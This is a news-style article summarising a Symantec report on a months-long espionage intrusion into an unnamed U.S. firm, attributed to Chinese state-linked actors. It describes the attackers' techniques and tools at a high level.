A recent report has revealed that a major U.S. firm fell victim to a four-month-long cyberattack, suspected to be orchestrated by Chinese state-sponsored hackers. According to cybersecurity experts from Broadcom-owned Symantec, the malicious activity began on April 11, 2024, and persisted until August, though the possibility of an earlier intrusion has not been ruled out.
Attack Methodology: Lateral Movement and Email Harvesting
The cybercriminals behind this campaign employed a variety of tactics to infiltrate the target organization’s network. Symantec's Threat Hunter Team discovered that the attackers moved laterally across the victim's internal systems, compromising multiple machines. Notably, some of the infected machines were Microsoft Exchange servers, hinting that the intruders were likely harvesting sensitive email data.
Additionally, the attackers deployed exfiltration tools, indicating that valuable information was stolen during the operation. While the name of the affected organization remains undisclosed, sources suggest it holds significant business ties to China.
Tactics Linked to Chinese Threat Actors
The techniques and tools used in the attack strongly suggest that Chinese threat actors were behind the breach. Evidence of DLL side-loading, a common method favored by Chinese hacker groups, points to state-backed involvement. Artifacts discovered during the investigation match those linked to a previously identified Chinese cyber operation known as Crimson Palace.
This breach isn't the first time the organization has been targeted by Chinese threat actors. In 2023, it was attacked by a group with links to Daggerfly, also known by other aliases such as Bronze Highland, Evasive Panda, and StormBamboo. The persistent nature of these attacks highlights the growing sophistication and determination of state-sponsored cyber campaigns.
Tools and Techniques Used by the Attackers
Symantec’s investigation revealed that the attackers relied on a mix of open-source tools and living-off-the-land (LotL) techniques. These included tools like FileZilla, Impacket, PSCP, and PowerShell, as well as native Windows utilities like Windows Management Instrumentation (WMI) and PsExec. These techniques allowed the threat actors to maintain stealth and avoid detection while moving within the network.
Interestingly, Symantec’s analysis uncovered that the earliest signs of compromise were traced back to a command executed via WMI from another system within the organization’s network. This suggests that the attackers had already breached at least one other machine prior to April 11, 2024, meaning the intrusion likely began earlier.
Focus on Microsoft Exchange Servers
One of the key targets in this attack was Microsoft Exchange servers. The attackers’ focus on email infrastructure further supports the theory that the goal was to exfiltrate sensitive communications. As email servers often house a treasure trove of confidential information, this tactic is frequently used by cyber-espionage groups aiming to gather intelligence.
Chinese Cyber Offensive Ecosystem
This breach sheds light on the broader dynamics of Chinese cyber operations. According to a report by Orange Cyberdefense, Chinese cyberattacks often involve complex networks of private and public entities. Universities and hack-for-hire contractors play critical roles, often executing operations under the direction of state-affiliated organizations like the Ministry of State Security or People’s Liberation Army.
To obscure attribution, Chinese operatives often establish fake companies that appear to engage in legitimate business but are, in fact, fronts for cyber-espionage activities. These companies procure digital infrastructure and recruit personnel for hacking operations, further complicating efforts to trace the attacks back to the Chinese government.
Conclusion
The discovery of this four-month cyberattack against a U.S. firm linked to Chinese hackers is a stark reminder of the persistent threat posed by state-sponsored cyber-espionage groups. With advanced tactics such as lateral movement, email harvesting, and DLL side-loading, these threat actors continue to breach organizations with sophisticated, well-resourced campaigns. As cybersecurity defenses evolve, so too will the strategies of these determined attackers, emphasizing the need for constant vigilance and improved threat detection methods.